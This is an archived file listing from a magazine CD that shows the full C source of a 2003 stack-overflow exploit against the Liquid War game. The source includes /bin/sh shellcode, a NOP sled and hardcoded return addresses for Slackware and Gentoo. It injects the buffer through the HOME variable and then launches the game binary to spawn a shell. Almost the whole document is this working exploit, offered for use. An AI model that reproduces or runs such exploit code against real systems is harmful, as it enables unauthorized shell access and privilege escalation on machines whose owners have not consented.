Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / liquidwars / LiquidWarExploit.c < prev

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 60 lines

/* * * http://www.rosiello.org * (c) Rosiello Security * * Copyright Rosiello Security 2003 * All Rights reserved. * * Tested on Slakware 9.0.0 & Gentoo 1.4 * * Author: Angelo Rosiello * Mail : angelo@rosiello.org * URL : http://ww.rosiello.org * * Greetz: Astharot by Zone-H who posted the stack overflow bug * */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> /* /bin/sh */ static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; #define NOP 0x90 #define LEN 520 //Buffer for Slackware 9.0.0 //#define LEN 528 //Buffer for Gentoo 1.4 #define RET 0xbffff414 //Valid Address for Slackware 9.0.0 //#define RET 0xbffff360 //Valid Address for Gentoo 1.4 int main() { char buffer[LEN]; long retaddr = RET; int i; fprintf(stderr, "\n(c) Rosiello Security 2003 - http://www.rosiello.org\n"); fprintf(stderr, "Liquidwar's exploit for Slackware 9.0.0\n"); fprintf(stderr, "by Angelo Rosiello - angelo@rosiello.org\n\n"); fprintf(stderr, "using address 0x%lx\n",retaddr); for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr; for (i=0;i<(LEN-strlen(shellcode)-50);i++) *(buffer+i) = NOP; memcpy(buffer+i,shellcode,strlen(shellcode)); /* export the variable, run liquidwar */ setenv("HOME", buffer, 1); execl("/usr/games/liquidwar","liquidwar",NULL); return 0; }